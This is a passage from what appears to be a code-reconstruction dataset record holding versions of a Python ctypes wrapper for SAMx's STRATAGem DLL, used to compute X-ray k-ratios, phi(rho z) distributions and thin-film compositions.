warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n 
ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-4": "<mask token>\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n\n\n class winreg:\n HKEY_CURRENT_USER = None\n\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import atomic_mass_kg_mol, mass_density_kg_m3\n_REGISTRY_KEY = 'Software\\\\SAMx\\\\Stratagem\\\\Configuration'\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\nPRZMODE_XPP = 0\n<mask token>\nPRZMODE_PAP = 1\n<mask token>\nPRZMODE_GAU = 2\n<mask token>\nFLUORESCENCE_NONE = 0\n<mask token>\nFLUORESCENCE_LINE = 1\n<mask token>\nFLUORESCENCE_LINE_CONT = 2\n<mask token>\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\n\ndef _check_key(method):\n\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. 
``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\\\SAMx\\\\Stratagem\\\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY\n ) as key:\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n cwd = os.getcwd()\n try:\n logger.debug('dll=%s', dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd)\n logger.debug('StEnableErrorDisplay(%r)', display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {}\n self._substrate = None\n self._experiments = {}\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n logger.debug('StObjectNew(key, %r, %i)', not standard, 0)\n if not self._lib.StObjectNew(key, 
bnormal_, iniflags_):\n self._raise_error('Cannot create object')\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. 
Call close() first.')\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear()\n self._substrate = None\n self._experiments.clear()\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = sample.substrate, index\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. 
note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m, layer.\n mass_thickness_kg_m2, layer.density_kg_m3)\n return sample\n sample = property(get_sample, set_sample, doc='Property to set/get sample')\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n logger.debug('StSdAddLayer(key)')\n ilayer_ = self._lib.StSdGetNbLayers(key)\n logger.debug('StSdAddLayer(key, %i)', ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error('Cannot add layer')\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error('Cannot add element')\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error('Cannot set atomic number')\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n wf_ = c.c_double(wf)\n logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error('Cannot set concentration')\n logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)\n ):\n self._raise_error('Cannot set concentration flag')\n if not substrate:\n thick_known = 
layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1000.0\n else:\n density = 10.0\n density_ = c.c_double(density)\n if thick_known:\n thickness = layer.thickness_m * 10000000000.0\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error('Cannot set thickness')\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n key_ = self._stobjectnew(standard=True)\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error('Cannot save standard')\n self._lib.StObjectDelete(key_)\n self._tmpstandards.append(filepath)\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. 
hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1000.0)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,\n experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.\n byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error('Cannot add atomic number and line')\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,\n iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_\n ):\n self._raise_error('Cannot set standard')\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error('Cannot add experiment analyzed flag')\n kratio_ = c.c_double(experiment.kratio)\n logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',\n ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /\n 1000.0, experiment.energy_eV / 1000.0, experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,\n hv_, kratio_, c.c_double(0.0), c.c_int(2)):\n self._raise_error('Cannot set experiment k-ratio')\n if experiment.is_analyzed():\n indexes = ielt_.value, iline_.value, iexpk_.value\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def 
get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error('Cannot set geometry parameters')\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(\n tilt_), c.byref(azimuth_)):\n self._raise_error('Cannot get geometry parameters')\n return toa_.value, tilt_.value, azimuth_.value\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n prz_mode = property(get_prz_mode, set_prz_mode, doc=\n 'Property to get/set prz mode')\n\n @_check_key\n def 
set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n fluorescence = property(get_fluorescence, set_fluorescence, doc=\n 'Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n standard_directory = property(get_standard_directory,\n set_standard_directory, doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer, thickness_low_m,\n thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n 
:return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2)\n if layer not in self._layers:\n raise ValueError('Unknown layer')\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n low_ = c.c_double(thickness_low_m * 1000000000.0)\n high_ = c.c_double(thickness_high_m * 1000000000.0)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer, \n thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_\n ):\n self._raise_error('Cannot compute k-ratio vs thickness')\n thicknesses = []\n kratios = {}\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error('Cannot get thickness')\n thicknesses.append(thick_.value)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. 
\n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n energy_ = c.c_double(energy_high_eV / 1000.0)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))\n self._lib.StSetMaxHV(energy_)\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error('Cannot compute k-ratio vs energy')\n energies = []\n kratios = {}\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1000.0) / step\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,\n bHV_, c.byref(k_)):\n self._raise_error('Cannot get k-ratio')\n kratios.setdefault(experiment, []).append(k_.value)\n energies.append(hv)\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n 
\"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError('Thickness of layer %i is unknown' % i)\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n _thicknesses, kratios = self.compute_kratio_vs_thickness(layer,\n thickness_low_m, thickness_high_m, step)\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n _energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,\n step)\n kratio = kratios[experiment][-1]\n if kratio < 0:\n logger.warn(\n 'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'\n )\n _energies, kratios = self.compute_kratio_vs_energy(\n energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n output.setdefault(experiment, kratio)\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n zs = set(exp.z for exp in self._experiments.keys())\n for layer in (list(self._layers.keys()) + [self._substrate[0]]):\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False)\n self.add_experiment(exp)\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n 
logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error('Cannot start iteration')\n continue_ = c.c_bool(True)\n iteration = 0\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n if not continue_.value:\n break\n logger.debug('Iteration completed')\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error('Cannot get number of elements')\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_\n ):\n self._raise_error('Cannot get layer concentration')\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n logger.debug('StSdGetThick(key, %i)', ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(\n thick_known), c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error('Cannot get thickness')\n return (composition, thickness.value / 10000000000.0, \n mass_thickness.value * 10.0, density.value * 1000.0)\n sample = Sample(get_layer(*self._substrate)[0])\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. 
warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n 
ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-5": "\"\"\"\nMain class of the interface.\nIt setups the experimental parameters such as the :class:`.Experiment`'s and\n:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of \n:math:`\\\\phi(\\\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and \nfluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).\n\"\"\"\n\n# Standard library modules.\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\n\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n class winreg:\n\n HKEY_CURRENT_USER = None\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n\n# Third party modules.\n\n# Local modules.\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import \\\n atomic_mass_kg_mol, mass_density_kg_m3\n\n# Globals and constants variables.\n_REGISTRY_KEY = \"Software\\SAMx\\Stratagem\\Configuration\"\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\n\nPRZMODE_XPP = 0\n\"\"\":math:`\\\\phi(\\\\rho z)` from XPP\"\"\"\n\nPRZMODE_PAP = 1\n\"\"\":math:`\\\\phi(\\\\rho z)` from PAP\"\"\"\n\nPRZMODE_GAU = 2\n\"\"\":math:`\\\\phi(\\\\rho z)` *unknown*, possibly two Gaussians\"\"\"\n\nFLUORESCENCE_NONE = 0\n\"\"\"No fluorescence\"\"\"\n\nFLUORESCENCE_LINE = 